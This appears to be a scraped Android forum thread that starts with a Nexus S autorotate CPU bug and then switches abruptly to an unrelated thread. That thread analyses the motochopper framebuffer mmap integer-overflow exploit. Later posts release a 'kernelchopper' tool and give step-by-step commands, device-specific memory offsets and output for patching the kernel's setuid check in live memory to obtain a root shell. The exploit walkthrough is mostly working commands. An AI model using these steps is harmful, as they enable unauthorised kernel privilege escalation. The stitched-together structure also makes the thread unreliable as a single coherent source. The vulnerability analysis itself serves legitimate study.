Hi,
I have a Nexus S with IMM76D_deodexed. Previously I had 4.0.3, then 4.0.4 - IMM26. Now IMM76D, CWM.
With IMM76D I hoped all would be solved, but no.
Before updating to IMM76D I did:
back to factory reset
format SD card
clean Dalvik
clean /system except /boot
Now I think I'm the only one who has the infamous autorotate high CPU usage bug
- without autorotate (cpu usage is normal):
Code:
top -m 100 -d 1 -n 1 | head -20
User 0%, System 3%, IOW 0%, IRQ 0%
User 0 + Nice 0 + Sys 4 + Idle 99 + IOW 0 + IRQ 0 + SIRQ 0 = 103
PID PR CPU% S #THR VSS RSS PCY UID Name
11891 0 7% R 1 1000K 396K bg root top
11867 0 0% S 1 0K 0K fg root kworker/0:0
11814 0 0% S 11 273628K 23708K bg app_70 com.google.android.maps.mytracks
132 0 0% S 81 369556K 45464K fg system system_server
330 0 0% S 25 294536K 29760K fg radio com.android.phone
8 0 0% S 1 0K 0K fg root sync_supers
9 0 0% S 1 0K 0K fg root bdi-default
10 0 0% S 1 0K 0K fg root kblockd
11 0 0% S 1 0K 0K fg root khubd
12 0 0% S 1 0K 0K fg root kinteractiveup
14 0 0% S 1 0K 0K fg root kswapd0
15 0 0% S 1 0K 0K fg root fsnotify_mark
16 0 0% S 1 0K 0K fg root crypto
with autorotate - system_server
Code:
top -m 100 -d 1 -n 1 | head -20
User 7%, System 12%, IOW 0%, IRQ 0%
User 6 + Nice 2 + Sys 13 + Idle 85 + IOW 0 + IRQ 0 + SIRQ 0 = 106
PID PR CPU% S #THR VSS RSS PCY UID Name
132 0 14% S 81 369572K 45768K fg system system_server
12030 0 5% R 1 1004K 400K bg root top
200 0 3% S 17 285416K 33964K fg system com.android.systemui
78 0 2% S 8 42944K 16884K fg system /system/bin/surfaceflinger
290 0 0% S 1 2464K 636K fg wifi /system/bin/wpa_supplicant
223 0 0% S 1 0K 0K fg root dhd_dpc
11939 0 0% S 1 0K 0K fg root kworker/0:1
10 0 0% S 1 0K 0K fg root kblockd
11 0 0% S 1 0K 0K fg root khubd
12 0 0% S 1 0K 0K fg root kinteractiveup
14 0 0% S 1 0K 0K fg root kswapd0
15 0 0% S 1 0K 0K fg root fsnoti
again top with Threads
Code:
User 5%, System 12%, IOW 0%, IRQ 0%
User 15 + Nice 3 + Sys 39 + Idle 254 + IOW 0 + IRQ 0 + SIRQ 0 = 311
PID TID PR CPU% S VSS RSS PCY UID Thread Proc
132 146 0 7% D 369572K 45768K fg system system_server system_server
12028 12028 0 4% R 1192K 588K bg root top top
132 166 0 2% S 369572K 45768K fg system er$SensorThread system_server
132 148 0 2% S 369572K 45768K fg system er.ServerThread system_server
132 147 0 1% S 369572K 45768K fg system SensorService system_server
200 200 0 0% S 285416K 33964K fg system ndroid.systemui com.android.systemui
11864 11864 0 0% S 0K 0K fg root kworker/u:2
11939 11939 0 0% S 0K 0K fg root kworker/0:1
78 111 0 0% S 42944K 16884K fg system SurfaceFlinger /system/bin/surfaceflinger
132 187 0 0% S 369572K 45768K fg system WifiService system_server
What should I do?
edit:
strace is writing following block repeatedly like crazy
strace -f -T -v -p 132
Code:
(Timeout) <0.000037>
[pid 147] write(103, "h\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0pe\34d\2340\0\0\354\337\267?>\205\[email protected]\275"..., 104 <unfinished ...>
[pid 166] <... epoll_wait resumed> ) = 1 <0.031740>
[pid 166] read(102, "h\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0pe\34d\2340\0\0\354\337\267?>\205\[email protected]\275"..., 104) = 104 <0.000034>
[pid 166] clock_gettime(CLOCK_MONOTONIC, {53448, 257720074}) = 0 <0.000030>
[pid 166] write(46, "W"..., 1) = 1 <0.000278>
[pid 166] read(102, 0x519ebb80, 104) = -1 EAGAIN (Resource temporarily unavailable) <0.000032>
[pid 166] epoll_wait(0x6a, 0x519eb9f0, 0x10, 0xffffffff <unfinished ...>
[pid 148] <... epoll_wait resumed> ) = 1 <0.029798>
[pid 148] read(45, "W"..., 16) = 1 <0.000038>
[pid 148] clock_gettime(CLOCK_MONOTONIC, {53448, 261245950}) = 0 <0.000035>
[pid 148] getpid() = 132 <0.000090>
[pid 148] getuid32() = 1000 <0.000029>
[pid 148] epoll_wait(0x2f, 0x50787a90, 0x10, 0) = 0 <0.000032>
[pid 148] clock_gettime(CLOCK_MONOTONIC, {53448, 263335575}) = 0 <0.000276>
[pid 148] epoll_wait(0x2f, 0x50787a90, 0x10, 0xa6d7 <unfinished ...>
[pid 147] <... write resumed> ) = 104 <0.008302>
[pid 147] poll([{fd=37, events=POLLIN}, {fd=38, events=POLLIN}, {fd=42, events=POLLIN}, {fd=43, events=POLLIN}, {fd=41, events=POLLIN}], 5, -1 <unfinished ...>
[pid 146] <... write resumed> ) = 16 <0.012667>
[pid 146] ioctl(39, 0x80066108, 0x50587ec0) = 0 <0.016268>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\2\0\0\0]\1\0\0"..., 16) = 16 <0.000044>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\2\0\1\0J\0\0\0"..., 16) = 16 <0.000300>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\2\0\2\0G\1\0\0"..., 16) = 16 <0.000039>
[pid 146] write(36, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 16 <unfinished ...>
[pid 147] <... poll resumed> ) = 1 ([{fd=42, revents=POLLIN}]) <0.021342>
[pid 147] read(42, "\310\320\0\0\352P\4\0\2\0\0\0]\1\0\0\310\320\0\0\333T\4\0\2\0\1\0J\0\0\0\310"..., 512) = 64 <0.000039>
[pid 147] poll([{fd=37, events=POLLIN}, {fd=38, events=POLLIN}, {fd=42, events=POLLIN}, {fd=43, events=POLLIN}, {fd=41, events=POLLIN}], 5, 0) = 0
Hey dude,
No, you are not the only one with the auto-rotate bug. I have it too, but I'm on stock, non-rooted ICS 4.0.4 for the Nexus S. But I can't help you either
Just wanted you to know that you are not alone.
What are the symptoms of this bug? Ever since I loaded 4.0.4, my phone seems to be eating up battery like crazy, also freezing up and shutting off randomly. Sounds like it could be my problem.
Should I just disable the auto-rotate setting for now?
00Hensley said:
What are the symptoms of this bug? Ever since I loaded 4.0.4, my phone seems to be eating up battery like crazy, also freezing up and shutting off randomly. Sounds like it could be my problem.
Should I just disable the auto-rotate setting for now?
It's worth a try, you can't damage anything if you do
I've been using the attached patch (against the stock ICS 3.0 kernel source, but should apply to any Nexus S 2.6.35 ICS or 3.0 kernel), which throttles the orientation sensor device and reduces system_server CPU usage to a more reasonable 2-3% (similar to Gingerbread).
Thanks for confirmation.
based on the confirmation there is new bug from me:
xxxttp://code.google.com/p/android/issues/detail?id=29965
For quick autorotate on and off I'm using a quick app:
xxxttps://play.google.com/store/apps/details?id=com.friedflow.autorotate&feature=order_history
Thanks for the kernel patch... but I think I will not be building a kernel...
I don't understand why these bugs are not fixed yet... Like USB slow file transfer...
steven676 said:
I've been using the attached patch (against the stock ICS 3.0 kernel source, but should apply to any Nexus S 2.6.35 ICS or 3.0 kernel), which throttles the orientation sensor device and reduces system_server CPU usage to a more reasonable 2-3% (similar to Gingerbread).
How's this patch working out for you? Any side effects to watch out for? Also, did you find anything more refined along the way?
Thanks!
InstigatorX said:
How's this patch working out for you? Any side effects to watch out for? Also, did you find anything more refined along the way?
I've been carrying this patch since December with absolutely no ill effects, and given that it works, I haven't bothered to look for better solutions ...
steven676 said:
I've been carrying this patch since December with absolutely no ill effects, and given that it works, I haven't bothered to look for better solutions ...
Any hints how to apply this patch?
I ran the motochopper[1] "pwn" binary under an unprivileged shell on my CM10.1 Nexus 7 (Tegra chipset, codename "grouper"), and was surprised to find that it gained administrative privileges by changing all "shell"-owned (uid 2000) processes on the system to run as uid 0.
It was somewhat worrying to see that an up-to-date ROM had an unpatched vulnerability, and I was concerned about whether rogue apps could leverage it. The CVE entry[2] was surprisingly vague, compounding my suspicions.
Further investigation indicated that motochopper is running a series of syscalls from within a SIGTRAP handler to thwart tracing:
Code:
1662 [4019c940] sigaction(0x5, 0xbecfdcc8, 0xbecfdcc8) = 0
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill(0x67e, 0x5) = 0
1662 [4019d160] kill(0, 0x5) = 0x5
1662 [4019c940] sigaction(0, 0xbecfdcb0, 0xbecfdcb0) = 0x5
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill() = 0
1662 [4019c940] sigaction(0x5, 0xbecfdcb0, 0xbecfdcb0) = 0
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill(0x67e, 0x5) = 0
1662 [4019d160] kill(0, 0x5) = 0x5
1662 [4019c940] sigaction(0, 0xbecfdcb0, 0xbecfdcb0) = 0x5
1662 [4019ba5c] gettid() = 0x67e
1662 [4019d160] kill() = 0
After disassembling the binary and patching it to invoke the syscalls directly, it looks like the problem involves the framebuffer driver. First, after opening a bunch of other (irrelevant, possibly decoy) devices, the exploit probes the real size of the framebuffer:
Code:
1728 open("/dev/graphics/fb0", O_RDWR) = 6
...
1728 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x400f2000
1728 munmap(0x400f2000, 4096) = 0
1728 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x40011000
1728 munmap(0x40011000, 8192) = 0
1728 mmap2(NULL, 12288, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x4006a000
1728 munmap(0x4006a000, 12288) = 0
...
1728 mmap2(NULL, 9433088, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x4015b000
1728 munmap(0x4015b000, 9433088) = 0
1728 mmap2(NULL, 9437184, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = 0x4015b000
1728 munmap(0x4015b000, 9437184) = 0
1728 mmap2(NULL, 9441280, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0) = -1 EINVAL (Invalid argument)
Then it tries to map the largest possible region into the process' address space:
Code:
1728 mmap2(NULL, 2415919104, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x70900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2399141888, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x71900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2382364672, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x72900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2365587456, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x73900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2348810240, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x74900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2332033024, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x75900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2315255808, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x76900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2298478592, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x77900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2281701376, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x78900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2264924160, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x79900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2248146944, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7a900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2231369728, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7b900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2214592512, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7c900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2197815296, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7d900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2181038080, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7e900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2164260864, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x7f900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2147483648, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x80900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2130706432, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x81900) = -1 ENOMEM (Out of memory)
1728 mmap2(NULL, 2113929216, PROT_READ|PROT_WRITE, MAP_SHARED, 6, 0x82900) = 0x4015b000
Clearly, a 2GB mapping on a 1GB device should not have succeeded; apparently this overlaps with kernel memory and the exploit is able to iterate through the task_struct / creds to change the uid 2000 processes to uid 0:
Code:
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 2000
1728 getuid() = 0
1728 getuid32() = 0
1728 write(1, "[+] Success!\n", 13) = 13
Checking the perms on /dev/graphics/fb0, it looks like most apps will not have access to this device (though the "graphics" group) and would not be able to directly use this exploit.
Some unanswered questions:
Does this exploit target the kernel's framebuffer infrastructure itself, or only specific drivers? I did not see any obvious fixes along the Linux 3.0 -stable branch, nor did I see any recent Asus kernel commits in the CM github repo.
Why was the binary built with -fPIC and -O0? Is this a form of obfuscation?
What is the significance of probing the framebuffer size? Is it meaningful that 9437184 = 0x900000, and the first mmap() length attempt was 2415919104 = 0x90000000?
[1] http://forum.xda-developers.com/showthread.php?t=2252248
[2] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2596
Edit:
Some recent changes were made to fbmem.c:fb_mmap() in mainline:
http://www.spinics.net/lists/stable/msg06210.html
https://lkml.org/lkml/2013/4/23/623
There is no custom fb_mmap() in Tegra's fb_ops struct.
Seeing the kernel maintainers madly rush to backport this innocuous-looking helper function to ancient releases like Linux 3.0, right around the same time motochopper was released (4/9), suggests that they might be trying to clean up a vulnerability in the framebuffer core.
Edit #2:
After staring at the code a little longer (and finally realizing that mmap2() takes a PAGE offset as its last argument, not a BYTE offset), here is what I see:
Code:
static int
fb_mmap(struct file *file, struct vm_area_struct * vma)
{
    struct fb_info *info = file_fb_info(file);
    struct fb_ops *fb;
    unsigned long off;
    unsigned long start;
    u32 len;

    if (!info)
        return -ENODEV;
    if (vma->vm_pgoff > (~0UL >> PAGE_SHIFT))
        return -EINVAL;
    off = vma->vm_pgoff << PAGE_SHIFT;
    fb = info->fbops;
    if (!fb)
        return -ENODEV;
    mutex_lock(&info->mm_lock);
    if (fb->fb_mmap) {
        int res;
        res = fb->fb_mmap(info, vma);
        mutex_unlock(&info->mm_lock);
        return res;
    }

    /* frame buffer memory */
    start = info->fix.smem_start;
    [color=red]len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.smem_len);[/color]
    if (off >= len) {
        /* memory mapped io */
        off -= len;
        if (info->var.accel_flags) {
            mutex_unlock(&info->mm_lock);
            return -EINVAL;
        }
        start = info->fix.mmio_start;
        len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
    }
    mutex_unlock(&info->mm_lock);
    start &= PAGE_MASK;
    [color=blue]if ((vma->vm_end - vma->vm_start + off) > len)
        return -EINVAL;[/color]
    off += start;
    vma->vm_pgoff = off >> PAGE_SHIFT;
    /* This is an IO map - tell maydump to skip this VMA */
    vma->vm_flags |= VM_IO | VM_RESERVED;
    vma->vm_page_prot = vm_get_page_prot(vma->vm_flags);
    fb_pgprotect(file, vma, off);
    [color=green]if (io_remap_pfn_range(vma, vma->vm_start, off >> PAGE_SHIFT,
                 vma->vm_end - vma->vm_start, vma->vm_page_prot))[/color]
        return -EAGAIN;
    return 0;
}
The initial mmap2/munmap sequence is trying to deduce the rounded smem_len + (smem_start partial page byte) value (len) by trying successively larger values until the check in blue returns -EINVAL. Result: 9437184 = 0x900000 (i.e. the framebuffer size is 9MB).
fb_mmap() is funny in that offsets 0 through (len-1) map the framebuffer, but offset (len) maps byte 0 of mmio_start. Which looks to be uninitialized (zero) in the Tegra driver.
The second sequence of mmap2() calls is trying to find the largest possible mapping. The kernel mmap2() syscall returns -ENOMEM if the mapping is too large for the virtual address space available to the process; fb_mmap() is not even called if this happens. When fb_mmap() is eventually called:
Page offset = 0x82900
Byte offset = off = 0x82900 << PAGE_SHIFT = 0x8290_0000
len = 0x90_0000 and "off" is much larger than len, so this hits the MMIO case. len is subtracted from off, leaving 0x8200_0000. Since the offset is so large, the length check in blue overflows: the VMA size of 0x7e00_0000 plus a len of 0x8200_0000 comes out to exactly 0x1_0000_0000; truncated to 32 bits this is zero. This passes the sanity test, so the code in green happily creates a read-write mapping starting at physical address 0 (mmio_start) and covering all of kernel memory.
So basically motochopper is exploiting an unpublicized (but belatedly patched) kernel bug in fbmem.c.
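The arithmetic from Edit #2, modelled in user space as an added example (not code from the post, the exploit, or the kernel tree): `fb_check()` mirrors the quoted `fb_mmap()` length check with 32-bit arithmetic and sets it beside an overflow-safe form. The `demo_fix` values (in particular `smem_start`), the `hardened` flag and the helper names are assumptions made for the example; the hardened comparison is one way to write the check, not the text of the upstream patch.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT    12
#define PAGE_SIZE     (1u << PAGE_SHIFT)
#define PAGE_MASK     (~(PAGE_SIZE - 1))
#define PAGE_ALIGN(x) (((x) + PAGE_SIZE - 1) & PAGE_MASK)

/* Subset of the fb "fix" info used by fb_mmap(). uint32_t models the
 * 32-bit "unsigned long" of the ARM kernel discussed in the post. */
struct fb_fix {
    uint32_t smem_start, smem_len;   /* framebuffer memory */
    uint32_t mmio_start, mmio_len;   /* register window    */
};

struct map_result {
    int      err;    /* 0 on success, negative errno otherwise      */
    uint32_t phys;   /* first physical byte that would be remapped  */
    uint32_t size;   /* length of the mapping in bytes              */
};

/* Constructed sample: 9 MB framebuffer (len = 0x900000 as probed in the
 * post) and an uninitialised MMIO window (start 0, length 0).
 * smem_start is a made-up, page-aligned placeholder. */
static const struct fb_fix demo_fix = {
    .smem_start = 0xab000000u, .smem_len = 0x00900000u,
    .mmio_start = 0u,          .mmio_len = 0u,
};

/* Decide whether a mapping of vma_size bytes at page offset pgoff is
 * accepted. hardened == 0 reproduces the check quoted in the post;
 * hardened != 0 uses a comparison that cannot wrap. */
static struct map_result fb_check(const struct fb_fix *fix, uint32_t pgoff,
                                  uint32_t vma_size, int hardened)
{
    struct map_result r = { -EINVAL, 0, 0 };
    uint32_t off, start, len;

    if (pgoff > (UINT32_MAX >> PAGE_SHIFT))
        return r;
    off   = pgoff << PAGE_SHIFT;
    start = fix->smem_start;
    len   = PAGE_ALIGN((start & ~PAGE_MASK) + fix->smem_len);

    if (off >= len) {                 /* falls through to the MMIO case */
        off  -= len;
        start = fix->mmio_start;
        len   = PAGE_ALIGN((start & ~PAGE_MASK) + fix->mmio_len);
    }
    start &= PAGE_MASK;

    if (hardened) {
        /* No addition, so nothing can wrap: the offset must lie inside
         * the region and the size must fit in what is left of it. */
        if (off > len || vma_size > len - off)
            return r;
    } else {
        /* Quoted check: the sum is truncated to 32 bits before the
         * comparison, so size + off == 2^32 compares as 0. */
        if ((uint32_t)(vma_size + off) > len)
            return r;
    }

    r.err  = 0;
    r.phys = start + off;
    r.size = vma_size;
    return r;
}

static void show(const char *what, struct map_result r)
{
    if (r.err)
        printf("%-34s rejected (errno %d)\n", what, -r.err);
    else
        printf("%-34s accepted: PA %#x, %#x bytes\n", what,
               (unsigned)r.phys, (unsigned)r.size);
}

int main(void)
{
    /* Values taken from the strace output in the post. */
    show("legacy   0x900000 @ pgoff 0",       fb_check(&demo_fix, 0, 0x900000u, 0));
    show("legacy   0x901000 @ pgoff 0",       fb_check(&demo_fix, 0, 0x901000u, 0));
    show("legacy   0x7e000000 @ pgoff 0x82900",
         fb_check(&demo_fix, 0x82900u, 0x7e000000u, 0));
    show("hardened 0x7e000000 @ pgoff 0x82900",
         fb_check(&demo_fix, 0x82900u, 0x7e000000u, 1));
    show("hardened 0x900000 @ pgoff 0",       fb_check(&demo_fix, 0, 0x900000u, 1));
    return 0;
}
```

Only a request whose size plus adjusted offset lands exactly on a multiple of 2^32 passes the quoted check against a zero-length MMIO window; a request one megabyte smaller at the same offset is rejected by both forms.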
I'm posting a new, open source utility called "kernelchopper" which uses djrbliss' fb_mmap exploit to allow the advanced user to explore and modify kernel memory on a non-rooted system.
kernelchopper employs a few extra refinements to maximize the amount of kernel memory exposed to the user application:
1) It is built and linked statically using the Linaro glibc toolchain, because dynamically linked Bionic binaries tend to map libraries and other stuff in the 0x4000_0000 user address range - a critical part of the address space that we'd like to reserve for the kernel memory mapping
2) It uses MAP_FIXED to force the kernel to use the lowest VA available, and adjusts the base address until it finds a mutually agreeable number
On my Nexus 7 I was able to map PA range 0x5000_0000 - 0xffff_ffff. On Tegra systems, system RAM starts at PA 0x8000_0000 (= kernel VA 0xc000_0000), so it is trivial to patch the kernel image in place.
Sample usage:
A quick check of /proc/iomem shows that physical memory starts at PA 0x8000_0000; the decompressed kernel image lives at VA 0xc000_8000 (ARM 3GB/1GB standard) = PA 0x8000_8000. Make a note of this for later:
Code:
80000000-beafffff : System RAM
80008000-80900a57 : Kernel text
80944000-80b841af : Kernel data
Since I built my ROM from source, I have a kernel image with full symbols. Install binutils-multiarch and disassemble with "objdump -d vmlinux":
Code:
c0077650 <sys_setuid>:
c0077650: e92d40f8 push {r3, r4, r5, r6, r7, lr}
c0077654: e1a05000 mov r5, r0
c0077658: eb0040d6 bl c00879b8 <prepare_creds>
c007765c: e2504000 subs r4, r0, #0
c0077660: 0a000027 beq c0077704 <sys_setuid+0xb4>
c0077664: e1a0200d mov r2, sp
c0077668: e3c23d7f bic r3, r2, #8128 ; 0x1fc0
c007766c: e3c3303f bic r3, r3, #63 ; 0x3f
c0077670: e3a00007 mov r0, #7
c0077674: e593300c ldr r3, [r3, #12]
c0077678: e59362fc ldr r6, [r3, #764] ; 0x2fc
c007767c: ebffd80f bl c006d6c0 <nsown_capable>
c0077680: e3500000 cmp r0, #0
[color=red]c0077684: 1a00000a bne c00776b4 <sys_setuid+0x64>[/color]
Forcing the branch in red to be taken unconditionally will allow any user to setuid() to any UID, bypassing the kernel's security checks. This is easy to do with kernelchopper. First verify that the code matches the disassembly:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper d 80077650 40
80077650: f8 40 2d e9 00 50 a0 e1 d6 40 00 eb 00 40 50 e2
80077660: 27 00 00 0a 0d 20 a0 e1 7f 3d c2 e3 3f 30 c3 e3
80077670: 07 00 a0 e3 0c 30 93 e5 fc 62 93 e5 0f d8 ff eb
80077680: 00 00 50 e3 [color=red]0a 00 00 1a[/color] 04 30 96 e5 05 00 53 e1
The little-endian word at PA 0x8007_7684 is 0a 00 00 1a = 0x1a00_000a. Let's change the instruction word to make it unconditional, and then invoke kernelchopper again to setuid() and spawn a shell:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper m 80077684
1a00000a
[email protected]:/data/local/tmp $ ./kernelchopper m 80077684 ea00000a
[email protected]:/data/local/tmp $ ./kernelchopper shell
[email protected]:/data/local/tmp # id
uid=0(root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
At this point you can remount /system read-write, install an "su" binary in /system/xbin, make the "su" binary setuid root, and install Superuser/SuperSU. You will probably want to reboot soon because any other process running on the system can also get root until the virgin kernel is reloaded, if it somehow knows to try.
kernelchopper can also dump ranges of memory (and/or your kernel image) to a file, for offline analysis. This can help in locating things that you might want to change.
Code:
[email protected]:/data/local/tmp $ ./kernelchopper d 80077650 bc setuid.bin
[email protected]:/data/local/tmp $ hexdump -C setuid.bin
00000000 f8 40 2d e9 00 50 a0 e1 d6 40 00 eb 00 40 50 e2 |.@-..P...@...@P.|
00000010 27 00 00 0a 0d 20 a0 e1 7f 3d c2 e3 3f 30 c3 e3 |'.... ...=..?0..|
00000020 07 00 a0 e3 0c 30 93 e5 fc 62 93 e5 0f d8 ff eb |.....0...b......|
00000030 00 00 50 e3 0a 00 00 ea 04 30 96 e5 05 00 53 e1 |..P......0....S.|
00000040 10 00 00 0a 0c 30 94 e5 05 00 53 e1 00 70 e0 13 |.....0....S..p..|
00000050 0c 00 00 0a 04 00 a0 e1 34 41 00 eb 07 00 a0 e1 |........4A......|
00000060 f8 80 bd e8 04 50 84 e5 0c 50 84 e5 04 30 96 e5 |.....P...P...0..|
00000070 05 00 53 e1 03 00 00 0a 04 00 a0 e1 97 fc ff eb |..S.............|
00000080 00 70 50 e2 f2 ff ff ba 14 50 84 e5 04 00 a0 e1 |.pP......P......|
00000090 1c 50 84 e5 06 10 a0 e1 01 20 a0 e3 cb 61 06 eb |.P....... ...a..|
000000a0 00 70 50 e2 ea ff ff ba 04 00 a0 e1 f8 40 bd e8 |.pP..........@..|
000000b0 32 41 00 ea 0b 70 e0 e3 e7 ff ff ea |2A...p......|
000000bc
It is often possible to dump the kernel image range from /proc/iomem and either extract the kallsyms information, or compare code sequences to a similar kernel for which you do have symbols. This would allow you to locate interesting functions like sys_setuid() in unfamiliar images.
@SW686,
Many, many thanks to you for your work on this.
Applying the latest OTA update for my ASUS TF700T left it in an almost unusable state due to some core frameworks not getting their permissions set properly. Fortunately, I still had ADB access, I just needed to get superuser privileges to fix the problem.
In the course of doing my research on how motochopper works so as to write my own exploit, I came across your posts. The clear and detailed explanations are excellent and saved me a great deal of time. Your kernelchopper did its job beautifully and allowed me to obtain a root shell and get my tab back to fully working condition. Although, admittedly, I was looking forward to the fun of writing my own hack. Thank you, again!
Cheers!
P.S. If you have a PayPal account and are so inclined, PM me your addy so I may send you a few dollars in appreciation.
doesn't seem to work on my Acer A700.
patched like 3 setuid offsets to ea00000a, ./kernelchopper shell still giving me
setuid() failed: Operation not permitted
that's that try to root the device with locked bootloader.
nex86 said:
doesn't seem to work on my Acer A700.
patched like 3 setuid offsets to ea00000a, ./kernelchopper shell still giving me
setuid() failed: Operation not permitted
that's that try to root the device with locked bootloader.
What's the version of the ROM you're running?
Rv16rc01 (Android 4.1.1)
I know there is a way to root it with an insecure boot.img, but that requires to unlock the bootloader.
It's just that there are people who want to root it without unlocking it, because there is no way to relock it.
nex86 said:
Rv16rc01 (Android 4.1.1)
OK, so the instruction to modify and its location are a bit different due to a combination of Acer building the kernel optimized for size and using (I believe) GCC 4.6. The instruction offset is 0x0006d258 and the instruction to modify is 0x0a000009.
These commands assume the kernel image starts at address 0x80008000. You can verify this using the command:
Code:
grep -Ei 'kernel (code|text)' /proc/iomem
The new set of commands and their output are:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper m 80075258
0a000009
[email protected]:/data/local/tmp $ ./kernelchopper m 80075258 eaffffff
[email protected]:/data/local/tmp $ ./kernelchopper shell
[email protected]:/data/local/tmp # id
uid=0(root) [snipped]
This should give you root privileges and let you proceed with the rest of the rooting process.
Out of curiosity, did you try to just run motochopper? It will push over the superuser application and binary for you and doesn't require modifying the kernel memory by hand.
Rooted Galaxy Express I8730T
Hi,
Just want to share my success in using 'kernelchopper' for Galaxy Express.
Following is information about the address location
./kernelchopper m 802806ec ea00000a
and files that I was able to copy over
/data/local/tmp/busybox mount -o remount,rw /system
/data/local/tmp/busybox mv /data/local/tmp/su /system/xbin/su
/data/local/tmp/busybox mv /data/local/tmp/Superuser.apk /system/app/Superuser.apk
/data/local/tmp/busybox cp /data/local/tmp/busybox /system/xbin/busybox
chown 0.0 /system/xbin/su
chmod 06755 /system/xbin/su
chmod 655 /system/app/Superuser.apk
chmod 755 /system/xbin/busybox
I'm attaching a few screenshots I took
Some more screenshots
Attaching few more pictures
Hi people,
First I have to say I admire your knowledge. I have a ZTE Blade G phone that hasn't been rooted yet. I figured the motochopper exploit might help, since the phone has MSM8225 SoC and it runs 4.1.2 android. It would not work. It actually wrote success once, but didn't actually get root. Now it just writes Bus Error. Now, I've poked a little with kernelchopper, but my /proc/iomem says quite a different thing from yours, presumably because the phone has just 512MB ram. If I try to dump any addresses above 80008000, it writes bus error. Here's the output:
Code:
00200000-0fbfffff : System RAM
00208000-00a48c6b : Kernel code
00a80000-00d33a23 : Kernel data
0fc01000-0fcfffff : System RAM
0fd01000-0fdfffff : System RAM
0fe01000-0fffffff : System RAM
20000000-296fffff : System RAM
a0000000-a001ffff : kgsl_3d0_reg_memory
a0000000-a001ffff : kgsl-3d0
a0200000-a0200fff : msm_serial_hs.0
a0300000-a0300fff : uartdm_resource
a0300000-a0300fff : msm_serial_hsl
I don't really know what this means, but I know in your program you don't allow addresses below 0x50000000, so it won't work. I figured I would kind of dump the whole kernel ram and search for similar commands. I don't even know how, but I figure it would be fun. So, can you point me in the right direction here? I'm a noob, but I want to learn. BTW, for my phone, there isn't any recovery image or I could disassemble, and the bootloader seems to be locked too.
fluxx_srb said:
I don't even know how, but I figure it would be fun. So, can you point me in the right direction here? I'm a noob, but I want to learn.
Hi fluxx_srb,
I can have a go at walking you through this if you'd like.
The prerequisites are: a Linux system with an ARM cross-compilation setup, the Linux kernel for your device (I usually get this from the firmware package provided by the OEM), and a copy of the kernel source used for the device (again, from the OEM).
Once you've got all these in place, then we can move on to the technical nitty-gritty.
Tried it, but it always crashes with Android itself when read/write memory.
I have a Sony Walkman NW-F807 (Tegra 2 with 512MB RAM) which isn't rooted yet. I've tried myself with some exploits like perf_events and diaggetroot, but they didn't work.
Code:
00000000-163fffff : System RAM
0003b000-006156f3 : Kernel text
00616000-007aaeef : Kernel data
16400000-164fffff : ram_console
16500000-167fffff : fbmem
50000000-50023fff : tegra_grhost
50000000-50023fff : tegra_grhost
